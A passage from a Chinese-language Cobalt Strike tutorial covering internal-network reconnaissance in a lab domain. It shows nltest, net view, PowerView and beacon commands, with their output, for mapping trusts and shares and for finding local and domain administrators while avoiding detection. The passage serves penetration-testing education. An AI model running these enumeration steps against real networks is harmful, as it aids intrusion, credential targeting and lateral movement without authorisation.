正在 Ping WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com <span class="token punctuation">[</span>192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124<span class="token punctuation">]</span> 具有 32 字节的数据:
来自 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124 的回复: 字节=32 时间&lt;1ms TTL=128
192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124 的 Ping 统计信息:
    数据包: 已发送 = 1，已接收 = 1，丢失 = 0 <span class="token punctuation">(</span>0<span class="token operator">%</span> 丢失<span class="token punctuation">)</span>，
往返行程的估计时间<span class="token punctuation">(</span>以毫秒为单位<span class="token punctuation">)</span>:
    最短 = 0ms，最长 = 0ms，平均 = 0ms
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><ul><li><p><code>nltest /domain_trusts</code>、<code>nltest /server:[address] /domain_trusts</code></p> <p>如果想取得域上的信任关系，可以使用 nltest 命令来实现。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; nltest <span class="token operator">/</span>domain_trusts
域信任的列表:
    0: TEAMSSIX teamssix<span class="token punctuation">.</span>com <span class="token punctuation">(</span>NT 5<span class="token punctuation">)</span> <span class="token punctuation">(</span>Forest Tree Root<span class="token punctuation">)</span> <span class="token punctuation">(</span>Primary Domain<span class="token punctuation">)</span> <span class="token punctuation">(</span>Native<span class="token punctuation">)</span>
此命令成功完成

<span class="token function">PS</span> C:\&gt; nltest <span class="token operator">/</span>server:192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124 <span class="token operator">/</span>domain_trusts
域信任的列表:
    0: TEAMSSIX teamssix<span class="token punctuation">.</span>com <span class="token punctuation">(</span>NT 5<span class="token punctuation">)</span> <span class="token punctuation">(</span>Forest Tree Root<span class="token punctuation">)</span> <span class="token punctuation">(</span>Primary Domain<span class="token punctuation">)</span> <span class="token punctuation">(</span>Native<span class="token punctuation">)</span>
此命令成功完成
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><ul><li><p><code>net view \\[name]</code></p> <p>如果想列出主机上的共享列表，只需输入<code>net view \\[name]</code>即可</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view \\WIN<span class="token operator">-</span>P2AASSD1AF1
在 \\WIN<span class="token operator">-</span>75F8PRJM4TP 的共享资源
共享名  类型  使用为  注释
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Users   Disk
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><h4 id="powerview">PowerView <a href="#powerview" class="header-anchor">#</a></h4> <p>在渗透进入内网后，如果直接使用 Windows 的内置命令，比如 <code>net view、net user</code>等，可能就会被管理人员或者各种安全监控设备所发现。因此较为安全的办法就是使用 Powershell 和 VMI 来进行躲避态势感知的检测。</p> <p>PowerView 是由 Will Schroeder 开发的 PowerShell 脚本，该脚本完全依赖于 Powershell 和 VMI ，使用 PowerView 可以更好的收集内网中的信息，在使用之前，与上一节 PowerUp 的一样需要先 import 导入 ps1 文件。</p> <p>PowerView 下载地址：<a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon" target="_blank" rel="noopener noreferrer">https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>一些 PowerView 的命令：</p> <ul><li><p>Get-NetDomain</p> <p>查询本地域的信息</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\PowerView&gt; <span class="token function">Get-NetDomain</span>
Forest                  : teamssix<span class="token punctuation">.</span>com
DomainControllers       : <span class="token punctuation">{</span>WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com<span class="token punctuation">}</span>
Children                : <span class="token punctuation">{</span><span class="token punctuation">}</span>
DomainMode              : Windows2012Domain
Parent                  :
PdcRoleOwner            : WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
RidRoleOwner            : WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
InfrastructureRoleOwner : WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
Name                    : teamssix<span class="token punctuation">.</span>com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><ul><li><p>Invoke-ShareFinder</p> <p>查找网络上是否存在共享</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\PowerView&gt; <span class="token function">Invoke-ShareFinder</span>
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\ADMIN$   <span class="token operator">-</span> 远程管理
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\C$       <span class="token operator">-</span> 默认共享
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\IPC$     <span class="token operator">-</span> 远程 IPC
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\NETLOGON         <span class="token operator">-</span> Logon server share
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\SYSVOL   <span class="token operator">-</span> Logon server share
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><ul><li><p>Invoke-MapDomainTrust</p> <p>显示当前域的信任关系</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\PowerView&gt; <span class="token function">Invoke-MapDomainTrust</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>其他更多用法可以查看参考链接，或者参考 PowerView 项目上的 ReadMe 部分。</p> <h4 id="net-模块">Net 模块 <a href="#net-模块" class="header-anchor">#</a></h4> <p>Cobalt Strike 中有自己的 net 模块，net 模块是 beacon 后渗透攻击模块，它通过 windows 的网络管理 api 函数来执行命令，想使用 net 命令，只需要在 beacon 的控制中心输入 net + 要执行的命令即可。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net dclist : 列出当前域的域控制器
net dclist <span class="token namespace">[DOMAIN]</span> : 列出指定域的域控制器
net share \\<span class="token namespace">[name]</span> : 列出目标的共享列表
net view : 列出当前域的主机
net view <span class="token namespace">[DOMAIN]</span> : 列出指定域的主机
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>在 beacon 控制台中输入这些命令很类似输入一个本地的 net 命令，但是有一些些许的不同，比如下面一个是在主机上运行 net view 的结果一个是在 beacon 控制台下运行 net view 的结果。不难看出，beacon 下输出的结果更为丰富。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view
服务器名称            注解
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
\\WIN<span class="token operator">-</span>P2AASSD1AF1
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; net view
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run net view
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 104504 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
List of hosts:
Server Name             IP Address                       Platform  Version  <span class="token function">Type</span>   Comment
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>             <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>                       <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>  <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">-</span>   <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
WIN<span class="token operator">-</span>P2AASSD1AF1         192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124                   500       6<span class="token punctuation">.</span>1      PDC    
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs15-1.png" alt=""></p> <h3 id="用户枚举">用户枚举 <a href="#用户枚举" class="header-anchor">#</a></h3> <p>用户枚举的三个关键步骤：</p> <p>1、当前账号是否为管理员账号？</p> <p>2、哪些账号是域管理员账号？</p> <p>3、哪个账号是这个系统上的本地管理员账号？</p> <h4 id="管理员账号">管理员账号 <a href="#管理员账号" class="header-anchor">#</a></h4> <p>第一个关键步骤，发现管理员账号。</p> <p>如果想知道自己是否为管理员账号，可以尝试运行一些只有管理员账号才有权限操作的命令，然后通过返回结果判断是否为管理员。</p> <p>其中一种方式是尝试列出仅仅只有管理员才能查看的共享列表，比如下面的 <code>dir \\host\C$</code> 命令，如果可以看到一个文件列表，那么说明可能拥有本地管理员权限。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">dir</span> \\host\C$
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#管理员账号运行结果</span>
beacon&gt; shell <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WinDC\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WinDC\C$ 的目录
2020<span class="token operator">/</span>06<span class="token operator">/</span>24  09:29    &lt;<span class="token function">DIR</span>&gt;          inetpub
2009<span class="token operator">/</span>07<span class="token operator">/</span>14  11:20    &lt;<span class="token function">DIR</span>&gt;          PerfLogs
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件              0 字节
               6 个目录 28<span class="token punctuation">,</span>500<span class="token punctuation">,</span>807<span class="token punctuation">,</span>680 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#一般账号运行结果</span>
beacon&gt; shell <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>也可以运行其他命令，比如运行下面的 <code>at</code> 命令来查看系统上的计划任务列表，如果显示出了任务列表信息，那么可能是本地管理员。（当任务列表没有信息时会返回 “列表是空的” 提示）</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell at \\host
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#管理员账号运行结果</span>
beacon&gt; shell at \\WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: at \\WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 51 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
状态 ID     日期                    时间          命令行
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
        1   今天                    22:30         E:\Install\Thunder\Thunder<span class="token punctuation">.</span>exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">#一般账号运行结果</span>
beacon&gt; shell at \\WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: at \\WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 51 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>在上一节讲述的 <code>PowerView</code> 有很多很好的自动操作来帮助解决这些问题。可以在加载 <code>PowerView</code> 后，运行下面的命令，通过 <code>PowerView</code> 可以快速找到管理员账号。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">Find-LocalAdminAccess</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell<span class="token operator">-</span>import powerview<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to import: powerview<span class="token punctuation">.</span>ps1
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 101224 bytes

beacon&gt; powershell <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Find-LocalAdminAccess</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 329 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
WinDC<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><h4 id="域管理员账号">域管理员账号 <a href="#域管理员账号" class="header-anchor">#</a></h4> <p>第二个关键步骤，发现域管理员账号。</p> <p><strong>列出域管理员</strong></p> <p>对于发现域管理员账号，可以在共享里使用本地的Windows命令。运行以下两条命令可以用来找出这些“域群组”的成员。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net <span class="token function">group</span> <span class="token string">&quot;enterprise admins&quot;</span> <span class="token operator">/</span>DOMAIN
net <span class="token function">group</span> <span class="token string">&quot;domain admins&quot;</span> <span class="token operator">/</span>DOMAIN
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net <span class="token function">group</span> <span class="token string">&quot;enterprise admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net <span class="token function">group</span> <span class="token string">&quot;enterprise admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 68 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
组名     Enterprise Admins
注释     企业的指定系统管理员
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Administrator            
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net <span class="token function">group</span> <span class="token string">&quot;domain admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net <span class="token function">group</span> <span class="token string">&quot;domain admins&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 64 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
组名     Domain Admins
注释     指定的域管理员
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Administrator            
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>或者运行下面的命令来看谁是域控制器上的管理员</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup <span class="token string">&quot;administrators&quot;</span> <span class="token operator">/</span>DOMAIN
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell net localgroup <span class="token string">&quot;administrators&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: net localgroup <span class="token string">&quot;administrators&quot;</span> <span class="token operator">/</span>domain
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 70 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
别名     administrators
注释     管理员对计算机<span class="token operator">/</span>域有不受限制的完全访问权
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
administrator
Domain Admins
Daniel
Enterprise Admins
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>Net 模块</strong></p> <p>beacon 的 net 模块也可以帮助我们，下面的命令中 <code>TARGET</code> 的意思是一个域控制器或者是任何想查看的组名，比如企业管理员、域管理员等等</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net <span class="token function">group</span> \\TARGET <span class="token function">group</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>也可以运行下面的命令，这会连接任意目标来获取列表</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup \\TARGET <span class="token function">group</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="本地管理员">本地管理员 <a href="#本地管理员" class="header-anchor">#</a></h4> <p><strong>Net 模块</strong></p> <p>本地管理员可能是一个域账户，因此如果想把一个系统作为目标，应该找到谁是这个系统的本地管理员，因为如果获得了它的密码哈希值或者凭据就可以伪装成那个用户。</p> <p>beacon 的 net 模块可以在系统上从一个没有特权的关联中查询本地组和用户。</p> <p>在 beacon 控制台中运行下面命令可以获得一个目标上的群组列表</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup \\TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果想获取群组的列表，可运行下面的命令来获得一个群组成员的名单列表。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net localgroup \\TARGET <span class="token function">group</span> name
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; net localgroup \\WinDC administrators
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run net localgroup administrators on WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 104510 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
Members of administrators on \\WinDC:
TEAMSSIX\Administrator
TEAMSSIX\Daniel
TEAMSSIX\Enterprise Admins
TEAMSSIX\Domain Admins
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>PowerView 模块</strong></p> <p>PowerView 使用下面的命令能够在一个主机上找到本地管理员，这条命令实际上通过管理员群组找到同样的群组并且把成员名单返回出来。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">Get-Netlocalgroup</span> <span class="token operator">-</span>hostname TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">Get-Netlocalgroup</span> <span class="token operator">-</span>Hostname WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Get-Netlocalgroup</span> <span class="token operator">-</span>Hostname WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 385 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:

ComputerName : WinDC
AccountName  : teamssix<span class="token punctuation">.</span>com<span class="token operator">/</span>Administrator
IsDomain     : True
IsGroup      : False
SID          : S<span class="token operator">-</span>1<span class="token operator">-</span>5<span class="token operator">-</span>22<span class="token operator">-</span>3301978333<span class="token operator">-</span>983314215<span class="token operator">-</span>684642015<span class="token operator">-</span>500
Description  : 
Disabled     : 
LastLogin    : 2020<span class="token operator">/</span>8<span class="token operator">/</span>17 22:21:23
PwdLastSet   : 
PwdExpired   : 
UserFlags    : 

ComputerName : WinDC
AccountName  : teamssix<span class="token punctuation">.</span>com<span class="token operator">/</span>Daniel
……内容过多，余下部分省略……
